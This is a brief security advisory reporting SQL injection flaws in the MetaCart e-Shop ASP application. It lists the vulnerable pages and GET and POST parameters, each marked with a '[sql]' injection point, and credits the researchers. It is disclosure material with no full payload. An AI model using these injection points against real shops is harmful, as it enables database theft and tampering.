MetaCart e-Shop suffers from SQL injection vulnerabilities.
2676b1eb7e490bd6a470544533d7925b3ae789930e75b2aecf7503ce66034bcc
vendor site:https://metalinks.com/
product:MetaCart e-Shop
bug:injection sql
risk:medium
injection sql (get) :
https://site.com/metacart/productsByCategory.asp?intCatalogID='[sql]
https://site.com/metacart/product.asp?intProdID='[sql]
injection sql(post) :
1 )https://site.com/metacart/searchAction.asp
variables :
/metacart/searchAction.asp?chkText=yes&strText='[sql]
2)https://site.com/metacart/searchAction.asp
variables :
/metacart/searchAction.asp?chkText=yes&strText=1&chkPrice=yes&chkCat=yes&sub
mit1=Submit&intPrice='[sql]
3)https://site.com/metacart/searchAction.asp
variables :
/metacart/searchAction.asp?chkText=yes&strText=1&chkPrice=yes&chkCat=yes&sub
mit1=Submit&intPrice=all&strCat='[sql]
laurent gaffié & benjamin mossé
https://s-a-p.ca/
contact: saps.audit@gmail.com